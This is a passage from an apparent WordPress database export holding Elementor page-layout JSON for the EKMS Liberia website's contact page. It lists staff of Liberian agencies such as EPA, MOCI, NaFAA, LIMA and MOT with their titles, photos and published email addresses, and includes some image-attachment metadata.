href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24677,3651,'_wp_attached_file','2021/03/simpson.png'),(24678,3651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:19:\"2021/03/simpson.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"simpson-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"simpson-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24679,3652,'_elementor_edit_mode','builder'),(24680,3652,'_elementor_template_type','wp-page'),(24681,3652,'_elementor_version','3.0.16'),(24682,3652,'_wp_page_template','default'),(24683,3652,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimensio